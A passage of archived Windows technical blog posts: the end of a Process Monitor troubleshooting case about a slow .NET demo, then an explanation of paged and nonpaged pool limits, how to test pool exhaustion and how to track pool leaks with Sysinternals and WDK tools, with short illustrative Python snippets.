The stack for events related to the Internet connection settings revealed that crypto was the reason: </P> <BR /> <P> <IMG alt="image" border="0" height="230" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_8.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121132i6C7456FF92744C28" style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; DISPLAY: inline; BORDER-TOP: 0px; BORDER-RIGHT: 0px" title="image" width="411" /> </P> <BR /> <P> One final piece of evidence I wanted to check for was that .NET was ultimately responsible for these checks. I rescanned the log and I saw events in the trace that confirmed that Stock Viewer is a .NET application: </P> <BR /> <P> <IMG alt="image" border="0" height="103" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121133i1E86873E9EC4CB2F" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> I also looked at the stacks of some of the early events referencing crypto Registry keys and saw that it was the .NET runtime performing the call to <A href="#" mce_href="#" target="_blank"> WinVerifyTrust </A> , the Windows function for checking the digital signature on a file, that started the cascade of attempted Internet accesses: </P> <BR /> <P> <IMG alt="image" border="0" height="299" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_11.png" 
original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121134i27141126855D8BF3" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="476" /> </P> <BR /> <P> Confident now that the startup delay was caused by .NET seeing that Stockviewer.exe was signed and then checking to see if the signing certificate had been revoked, I searched the Web for a way to make .NET skip the check, since I knew that the keynote machines probably wouldn’t be connected to the Internet during the actual keynote. After a couple of minutes of reading through articles by others with similar experiences, I found this <A href="#" mce_href="#" target="_blank"> KB article </A> : </P> <BR /> <P> <IMG alt="image" border="0" height="206" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_9.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121135i006FA8D28B864210" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> The article describes exactly the symptoms we were seeing and notes that .NET 2.0, which is the version of .NET I could see Stock Viewer was using based on the paths of the .NET DLLs it accessed during the trace, supports a way to turn off its obligatory checking of assembly digital signatures: create a configuration file in the executable’s directory with the same name as the executable except with “.config” appended (e.g. 
StockViewer.exe.config) containing the following XML: </P> <BR /> <P> <FONT face="Courier New" size="2"> &lt;?xml version="1.0" encoding="utf-8"?&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;configuration&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;runtime&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;generatePublisherEvidence enabled="false"/&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;/runtime&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;/configuration&gt; </FONT> </P> <BR /> <P> About 15 minutes after I had received Jason’s email, I sent him a reply explaining my conclusion with the configuration file attached. Shortly after, he wrote back confirming the delays were gone and expressing amazement that I had figured out the problem and solution so quickly. It might have seemed like magic to him, but I had simply used basic Process Monitor troubleshooting techniques and the Web to solve the case. Needless to say, the revised demo flow and transition between AppLocker and application compatibility came off great. </P> </BODY></HTML> Thu, 27 Jun 2019 06:52:21 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-keynote-demo/ba-p/723801 MarkRussinovich 2019-06-27T06:52:21Z Pushing the Limits of Windows: Paged and Nonpaged Pool https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-paged-and-nonpaged-pool/ba-p/723789 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 10, 2009 </STRONG> <BR /> <P> In previous Pushing the Limits posts, I described the two most basic system resources, <A href="#" target="_blank"> physical memory </A> and <A href="#" target="_blank"> virtual memory </A> . 
This time I’m going to describe two fundamental kernel resources, paged pool and nonpaged pool, that are based on those, and that are directly responsible for many other system resource limits including the maximum number of processes, synchronization objects, and handles. </P> <P> Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <BLOCKQUOTE> </BLOCKQUOTE> <P> Paged and nonpaged pools serve as the memory resources that the operating system and device drivers use to store their data structures. The pool manager operates in kernel mode, using regions of the system’s virtual address space (described in the Pushing the Limits post on virtual memory) for the memory it sub-allocates. The kernel’s pool manager operates similarly to the C-runtime and Windows heap managers that execute within user-mode processes.&nbsp; Because the minimum virtual memory allocation size is a multiple of the system page size (4KB on x86 and x64), these subsidiary memory managers carve up larger allocations into smaller ones so that memory isn’t wasted. 
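</P> <P> The idea of carving small allocations out of a larger one can be sketched in a few lines of Python. This is a toy model only: it hands out consecutive pieces of a single page-sized region and never frees them, whereas real heap and pool managers track free lists and much more. The class and method names are invented for the example. </P> <PRE>
```python
PAGE_SIZE = 4096  # system page size on x86 and x64, in bytes

class Region:
    """A toy sub-allocator that hands out pieces of one page-sized region."""

    def __init__(self, size=PAGE_SIZE):
        self.size = size
        self.next_free = 0  # offset where the unused part of the region begins

    def allocate(self, nbytes):
        """Return the offset of a new block, or None if the region is exhausted."""
        if self.next_free + nbytes > self.size:
            return None
        offset = self.next_free
        self.next_free += nbytes
        return offset

region = Region()
first = region.allocate(512)
second = region.allocate(512)
remaining = region.size - region.next_free

print(first, second, remaining)
```
</PRE> <P> Two small requests share one page here instead of each consuming a page of its own. 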
</P> <P> For example, if an application wants a 512-byte buffer to store some data, a heap manager takes one of the regions it has allocated and notes that the first 512 bytes are in use, returning a pointer to that memory and putting the remaining memory on a list it uses to track free heap regions. The heap manager satisfies subsequent allocations using memory from the free region, which begins just past the 512-byte region that is allocated. </P> <H3> Nonpaged Pool </H3> <P> The kernel and device drivers use nonpaged pool to store data that might be accessed when the system can’t handle page faults. The kernel enters such a state when it executes interrupt service routines (ISRs) and deferred procedure calls (DPCs), which are functions related to hardware interrupts. Page faults are also illegal while the kernel or a device driver holds a spin lock. Because spin locks are the only type of lock that can be used within ISRs and DPCs, they must be used to protect data structures that are shared between ISRs or DPCs and other ISRs, DPCs, or code executing on kernel threads. Failure by a driver to honor these rules results in the most common crash code, <A href="#" target="_blank"> IRQL_NOT_LESS_OR_EQUAL </A> . </P> <P> Nonpaged pool is therefore always kept present in physical memory and nonpaged pool virtual memory is assigned physical memory. Common system data structures stored in nonpaged pool include the kernel objects that represent processes and threads, synchronization objects like mutexes, semaphores and events, references to files, which are represented as file objects, and I/O request packets (IRPs), which represent I/O operations. </P> <H3> Paged Pool </H3> <P> Paged pool, on the other hand, gets its name from the fact that Windows can write the data it stores to the paging file, allowing the physical memory it occupies to be repurposed. 
Just as for user-mode virtual memory, when a driver or the system references paged pool memory that’s in the paging file, an operation called a page fault occurs, and the memory manager reads the data back into physical memory. The largest consumer of paged pool, at least on Windows Vista and later, is typically the Registry, since references to registry keys and other registry data structures are stored in paged pool. The data structures that represent memory mapped files, called <EM> sections </EM> internally, are also stored in paged pool. </P> <P> Device drivers use the <A href="#" target="_blank"> ExAllocatePoolWithTag </A> API to allocate nonpaged and paged pool, specifying the type of pool desired as one of the parameters. Another parameter is a 4-byte <EM> Tag </EM> , which drivers are supposed to use to uniquely identify the memory they allocate, and that can be a useful key for tracking down drivers that leak pool, as I’ll show later. </P> <H3> Viewing Paged and Nonpaged Pool Usage </H3> <P> There are three performance counters that indicate pool usage: </P> <UL> <LI> Pool nonpaged bytes </LI> <LI> Pool paged bytes (virtual size of paged pool – some may be paged out) </LI> <LI> Pool paged resident bytes (physical size of paged pool) </LI> </UL> <P> However, there are no performance counters for the maximum size of these pools. They can be viewed with the kernel debugger !vm command, but with Windows Vista and later to use the kernel debugger in local kernel debugging mode you must boot the system in debugging mode, which disables MPEG2 playback. </P> <P> So instead, use Process Explorer to view both the currently allocated pool sizes, as well as the maximum. To see the maximum, you’ll need to configure Process Explorer to use symbol files for the operating system. First, install the latest <A href="#" target="_blank"> Debugging Tools for Windows </A> package. 
Then run Process Explorer and open the Symbol Configuration dialog in the Options menu and point it at the dbghelp.dll in the Debugging Tools for Windows installation directory and set the symbol path to point at Microsoft’s symbol server: </P> <P> <IMG alt="image" border="0" height="221" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121105iFFED344EAE4F135E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> After you’ve configured symbols, open the System Information dialog (click System Information in the View menu or press Ctrl+I) to see the pool information in the Kernel Memory section. Here’s what that looks like on a 2GB Windows XP system: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121106i985B891A378EB826" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="184" /> </P> <P> <EM> 2GB 32-bit Windows XP </EM> </P> <H3> Nonpaged Pool Limits </H3> <P> As I mentioned in a previous post, on 32-bit Windows, the system address space is 2GB by default. That inherently caps the upper bound for nonpaged pool (or any type of system virtual memory) at 2GB, but it has to share that space with other types of resources such as the kernel itself, device drivers, system Page Table Entries (PTEs), and cached file views. </P> <P> Prior to Vista, the memory manager on 32-bit Windows calculates how much address space to assign each type at boot time. 
Its formulas take into account various factors, the main one being the amount of physical memory on the system.&nbsp; The amount it assigns to nonpaged pool starts at 128MB on a system with 512MB and goes up to 256MB for a system with a little over 1GB or more. On a system booted with the /3GB option, which expands the user-mode address space to 3GB at the expense of the kernel address space, the maximum nonpaged pool is 128MB. The Process Explorer screenshot shown earlier reports the 256MB maximum on a 2GB Windows XP system booted without the /3GB switch. </P> <P> The memory manager in 32-bit Windows Vista and later, including Server 2008 and Windows 7 (there is no 32-bit version of Windows Server 2008 R2), doesn’t carve up the system address space statically; instead, it dynamically assigns ranges to different types of memory according to changing demands. However, it still sets a maximum for nonpaged pool that’s based on the amount of physical memory, either slightly more than 75% of physical memory or 2GB, whichever is smaller. Here’s the maximum on a 2GB Windows Server 2008 system: </P> <P> <IMG alt="image" border="0" height="119" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121107i788273D1AF235A65" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="179" /> </P> <P> <EM> 2GB 32-bit Windows Server 2008 </EM> </P> <P> 64-bit Windows systems have a much larger address space, so the memory manager can carve it up statically without worrying that different types might not have enough space. 64-bit Windows XP and Windows Server 2003 set the maximum nonpaged pool to a little over 400K per MB of RAM or 128GB, whichever is smaller. 
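</P> <P> The two rules just described reduce to simple arithmetic. Here is a minimal Python sketch of that arithmetic, not the memory manager’s actual code: the function names are hypothetical, and the constants are the round figures quoted above. Because the real values are “slightly more than” 75% and “a little over” 400K per MB, a real system reports a somewhat higher limit than this sketch computes. </P>
<PRE>
```python
# Approximate nonpaged pool maximums from the round figures quoted in the text.
# The function names are illustrative only; Windows exposes no such API.
KB = 1024
MB = 1024 * KB
GB = 1024 * MB


def nonpaged_max_32bit_vista(ram_bytes):
    """32-bit Vista and later: about 75% of RAM, capped at 2GB."""
    return min(ram_bytes * 3 // 4, 2 * GB)


def nonpaged_max_64bit_xp(ram_bytes):
    """64-bit XP and Server 2003: about 400K per MB of RAM, capped at 128GB."""
    ram_mb = ram_bytes // MB
    return min(ram_mb * 400 * KB, 128 * GB)


if __name__ == "__main__":
    ram = 2 * GB
    print(nonpaged_max_32bit_vista(ram) // MB, "MB")  # 1536 MB
    print(nonpaged_max_64bit_xp(ram) // MB, "MB")     # 800 MB
```
</PRE>
<P>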
Here’s a screenshot from a 2GB 64-bit Windows XP system: </P> <P> <IMG alt="image" border="0" height="117" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121108i7D08DFEDD39E8D0F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="179" /> </P> <P> <EM> 2GB 64-bit Windows XP </EM> </P> <P> 64-bit Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2 memory managers match their 32-bit counterparts (where applicable – as mentioned earlier, there is no 32-bit version of Windows Server 2008 R2) by setting the maximum to approximately 75% of RAM, but they cap the maximum at 128GB instead of 2GB. Here’s the screenshot from a 2GB 64-bit Windows Vista system, which has a nonpaged pool limit similar to that of the 32-bit Windows Server 2008 system shown earlier. 
</P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121109i8AE23A5E6003185E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="176" /> </P> <P> <EM> 2GB 64-bit Windows Vista </EM> </P> <P> Finally, here’s the limit on an 8GB 64-bit Windows 7 system: </P> <P> <IMG alt="image" border="0" height="118" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121110i5A4C2D3A70CB5789" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="176" /> </P> <P> <EM> 8GB 64-bit Windows 7 </EM> </P> <P> Here’s a table summarizing the nonpaged pool limits across different versions of Windows: </P> <TABLE border="1" cellpadding="2" cellspacing="0" width="560"> <TBODY> <TR> <TD valign="top" width="179"> </TD> <TD align="center" valign="top" width="183"> <STRONG> 32-bit </STRONG> </TD> <TD align="center" valign="top" width="195"> <STRONG> 64-bit </STRONG> </TD> </TR> <TR> <TD valign="top" width="179"> <STRONG> XP, Server 2003 </STRONG> </TD> <TD align="center" valign="top" width="183"> up to 1.2GB RAM: 32-256 MB <BR /> &gt; 1.2GB RAM: 256MB </TD> <TD align="center" valign="top" width="195"> min( ~400K/MB of RAM, 128GB) </TD> </TR> <TR> <TD valign="top" width="179"> <STRONG> Vista, Server 2008, <BR /> Windows 7, Server 2008 R2 </STRONG> </TD> <TD align="center" valign="top" width="183"> min( ~75% of RAM, 2GB) </TD> <TD align="center" valign="top" width="195"> min(~75% of RAM, 128GB) </TD> </TR> <TR> <TD valign="top" width="179"> <STRONG> Windows 8, 
Server 2012 </STRONG> </TD> <TD align="center" valign="top" width="183"> min( ~75% of RAM, 2GB) </TD> <TD align="center" valign="top" width="195"> min( 2x RAM, 128GB) </TD> </TR> </TBODY> </TABLE> <H3> Paged Pool Limits </H3> <P> The kernel and device drivers use paged pool to store any data structures that won’t ever be accessed from inside a DPC or ISR or when a spinlock is held. That’s because the contents of paged pool can either be present in physical memory or, if the memory manager’s working set algorithms decide to repurpose the physical memory, be sent to the paging file and demand-faulted back into physical memory when referenced again. Paged pool limits are therefore primarily dictated by the amount of system address space the memory manager assigns to paged pool, as well as the system commit limit. </P> <P> On 32-bit Windows XP, the limit is calculated based on how much address space is assigned to other resources, most notably system PTEs, with an upper limit of 491MB. The 2GB Windows XP system shown earlier has a limit of 360MB, for example: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121111i30D28324087A573C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="184" /> </P> <P> <EM> 2GB 32-bit Windows XP </EM> </P> <P> 32-bit Windows Server 2003 reserves more space for paged pool, so its upper limit is 650MB. </P> <P> Since 32-bit Windows Vista and later have dynamic kernel address space, they simply set the limit to 2GB. Paged pool will therefore run out either when the system address space is full or the system commit limit is reached. 
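</P> <P> As a rough illustration of how these caps combine, the following Python sketch computes a paged pool ceiling from the figures in this section. It is a simplified model built on assumptions: paged_pool_limit and its parameters are hypothetical names, the 64-bit rules are taken from the summary table later in this section, and the 32-bit XP and Server 2003 values are only the upper bounds, since the real limit on those systems depends on how much address space goes to other resources. </P>
<PRE>
```python
MB = 1024 * 1024
GB = 1024 * MB


def paged_pool_limit(os_family, bits, commit_limit=None, nonpaged_limit=None):
    """Return an approximate paged pool ceiling in bytes (hypothetical helper).

    os_family: "xp", "2003", or "vista+" (Vista, Server 2008,
               Windows 7, Server 2008 R2).
    bits:      32 or 64.
    """
    if bits == 32:
        if os_family == "xp":
            return 491 * MB          # upper bound only; often lower in practice
        if os_family == "2003":
            return 650 * MB          # upper bound only
        if commit_limit is None:
            raise ValueError("commit_limit is required for 32-bit Vista and later")
        return min(commit_limit, 2 * GB)

    if os_family in ("xp", "2003"):
        if nonpaged_limit is None:
            raise ValueError("nonpaged_limit is required for 64-bit XP/2003")
        return min(4 * nonpaged_limit, 128 * GB)

    if commit_limit is None:
        raise ValueError("commit_limit is required for 64-bit Vista and later")
    return min(commit_limit, 128 * GB)
```
</PRE>
<P> For example, paged_pool_limit("vista+", 32, commit_limit=3 * GB) returns 2GB, because the address-space cap is reached before the commit limit. </P> <P>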
</P> <P> 64-bit Windows XP and Windows Server 2003 set their maximums to four times the nonpaged pool limit or 128GB, whichever is smaller. Here again is the screenshot from the 64-bit Windows XP system, which shows that the paged pool limit is exactly four times that of nonpaged pool: </P> <P> <IMG alt="image" border="0" height="117" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121112iAC3EC3D0B967229B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="179" /> </P> <P> <EM> 2GB 64-bit Windows XP </EM> </P> <P> Finally, 64-bit versions of Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2 simply set the maximum to 128GB, allowing paged pool’s limit to track the system commit limit. Here’s the screenshot of the 64-bit Windows 7 system again: </P> <P> <IMG alt="image" border="0" height="118" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121113i9D4F7C7F0310A257" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="176" /> </P> <P> <EM> 8GB 64-bit Windows 7 </EM> </P> <P> Here’s a summary of paged pool limits across operating systems: </P> <TABLE border="1" cellpadding="2" cellspacing="0" width="581"> <TBODY> <TR> <TD valign="top" width="171"> </TD> <TD align="center" valign="top" width="174"> <STRONG> 32-bit </STRONG> </TD> <TD align="center" valign="top" width="234"> <STRONG> 64-bit </STRONG> </TD> </TR> <TR> <TD valign="top" width="171"> <STRONG> XP, Server 2003 </STRONG> </TD> <TD align="center" valign="top" width="174"> XP: up to 491MB <BR /> 
Server 2003: up to 650MB </TD> <TD align="center" valign="top" width="234"> min( 4 * nonpaged pool limit, 128GB) </TD> </TR> <TR> <TD valign="top" width="171"> <STRONG> Vista, Server 2008, <BR /> Windows 7, Server 2008 R2 </STRONG> </TD> <TD align="center" valign="top" width="174"> min( system commit limit, 2GB) </TD> <TD align="center" valign="top" width="234"> min( system commit limit, 128GB) </TD> </TR> <TR> <TD valign="top" width="171"> <STRONG> Windows 8, Server 2012 </STRONG> </TD> <TD align="center" valign="top" width="174"> min( system commit limit, 2GB) </TD> <TD align="center" valign="top" width="234"> min( system commit limit, 384GB) </TD> </TR> </TBODY> </TABLE> <H3> Testing Pool Limits </H3> <P> Because the kernel pools are used by almost every kernel operation, exhausting them can lead to unpredictable results. If you want to witness first hand how a system behaves when pool runs low, use the <A href="#" target="_blank"> Notmyfault </A> tool. It has options that cause it to leak either nonpaged or paged pool in the increment that you specify. You can change the leak size while it’s leaking if you want to change the rate of the leak and Notmyfault frees all the leaked memory when you exit it: </P> <P> <IMG alt="image" border="0" height="450" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121114iAF713F59D631A4BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="251" /> </P> <P> Don’t run this on a system unless you’re prepared for possible data loss, as applications and I/O operations will start failing when pool runs out. You might even get a blue screen if the driver doesn’t handle the out-of-memory condition correctly (which is considered a bug in the driver). 
The Windows Hardware Quality Laboratory (WHQL) stresses drivers using the Driver Verifier, a tool built into Windows, to make sure that they can tolerate out-of-pool conditions without crashing, but you might have third-party drivers that haven’t gone through such testing or that have bugs that weren’t caught during WHQL testing. </P> <P> I ran Notmyfault on a variety of test systems in virtual machines to see how they behaved and didn’t encounter any system crashes, but did see erratic behavior. After nonpaged pool ran out on a 64-bit Windows XP system, for example, trying to launch a command prompt resulted in this dialog: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121115i2174BF72BC57FDEE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="420" /> </P> <P> On a 32-bit Windows Server 2008 system where I already had a command prompt running, even simple operations like changing the current directory and directory listings started to fail after nonpaged pool was exhausted: </P> <P> <IMG alt="image" border="0" height="102" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121116i8104138CE4189C8A" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> On one test system, I eventually saw this error message indicating that data had potentially been lost. I hope you never see this dialog on a real system! 
</P> <P> <IMG alt="image" border="0" height="108" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121117i1DE6A4ADBF92A1AC" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Running out of paged pool causes similar errors. Here’s the result of trying to launch Notepad from a command prompt on a 32-bit Windows XP system after paged pool had run out. Note how Windows failed to redraw the window’s title bar and the different errors encountered for each attempt: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121118i783C09F3B9B3FB1A" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="444" /> </P> <P> And here’s the start menu’s Accessories folder failing to populate on a 64-bit Windows Server 2008 system that’s out of paged pool: </P> <P> <IMG alt="image" border="0" height="59" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121119iB2869FDFB4061088" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="181" /> </P> <P> Here you can see the system commit level, also displayed on Process Explorer’s System Information dialog, quickly rise as Notmyfault leaks large chunks of paged pool and hits the 2GB maximum on a 2GB 32-bit Windows Server 2008 system: </P> <P> <IMG 
alt="image" border="0" height="84" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121120i0D0EC00BA0671C47" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="202" /> </P> <P> The reason that Windows doesn’t simply crash when pool is exhausted, even though the system is unusable, is that pool exhaustion can be a temporary condition caused by an extreme workload peak, after which pool is freed and the system returns to normal operation. When a driver (or the kernel) leaks pool, however, the condition is permanent and identifying the cause of the leak becomes important. That’s where the pool tags described at the beginning of the post come into play. </P> <H3> Tracking Pool Leaks </H3> <P> When you suspect a pool leak and the system is still able to launch additional applications, Poolmon, a tool in the <A href="#" target="_blank"> Windows Driver Kit </A> , shows you the number of allocations and outstanding bytes of allocation by type of pool and the tag passed into calls of ExAllocatePoolWithTag. Various hotkeys cause Poolmon to sort by different columns; to find the leaking allocation type, use either ‘b’ to sort by bytes or ‘d’ to sort by the difference between the number of allocations and frees. 
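</P> <P> To make the two sort orders concrete, here is a small Python sketch over made-up per-tag records. The field names and sample numbers are hypothetical and only mirror the columns described above; this is not Poolmon’s implementation or its output format. </P>
<PRE>
```python
from collections import namedtuple

# One row per tag and pool type, loosely modeled on the columns described in the text.
TagRow = namedtuple("TagRow", "tag pool_type allocs frees bytes")


def sort_by_bytes(rows):
    """Like the 'b' hotkey: largest outstanding byte count first."""
    return sorted(rows, key=lambda r: r.bytes, reverse=True)


def sort_by_diff(rows):
    """Like the 'd' hotkey: largest (allocations - frees) first."""
    return sorted(rows, key=lambda r: r.allocs - r.frees, reverse=True)


# Invented sample data: a few huge leaked blocks and many small live ones.
rows = [
    TagRow("File", "Nonp", 5000, 4990, 10 * 384),
    TagRow("Leak", "Paged", 14, 0, 14 * 100 * 1024 * 1024),
    TagRow("Ntfx", "Paged", 900, 880, 20 * 96),
]

print(sort_by_bytes(rows)[0].tag)  # Leak
print(sort_by_diff(rows)[0].tag)   # Ntfx
```
</PRE>
<P> In this invented data the two orders disagree: a handful of very large leaked blocks tops the byte view, while a tag with many small outstanding allocations tops the difference view, which is why it can be worth checking both. </P> <P>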
Here’s Poolmon running on a system where Notmyfault has leaked 14 allocations of about 100MB each: </P> <P> <IMG alt="image" border="0" height="192" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121121i99B71EE709F6EA16" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> After identifying the guilty tag in the left column, in this case ‘Leak’, the next step is finding the driver that’s using it. Since the tags are stored in the driver image, you can do that by scanning driver images for the tag in question. The <A href="#" target="_blank"> Strings </A> utility from Sysinternals dumps printable strings in the files you specify (that are by default a minimum of three characters in length), and since most device driver images are in the %Systemroot%\System32\Drivers directory, you can open a command prompt, change to that directory and execute “strings * | findstr &lt;tag&gt;”. After you’ve found a match, you can dump the driver’s version information with the Sysinternals <A href="#" target="_blank"> Sigcheck </A> utility. 
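</P> <P> The same search can be approximated without Strings. The Python sketch below is only an illustration, not how Strings works internally: it reports every file in a directory whose raw bytes contain the tag as ASCII text, so unlike Strings it does not look for Unicode strings. find_tag_users is a hypothetical helper name, and the directory it scans by default is the one named above. </P>
<PRE>
```python
import os


def find_tag_users(tag, directory):
    """Return sorted names of files in `directory` whose bytes contain `tag` as ASCII."""
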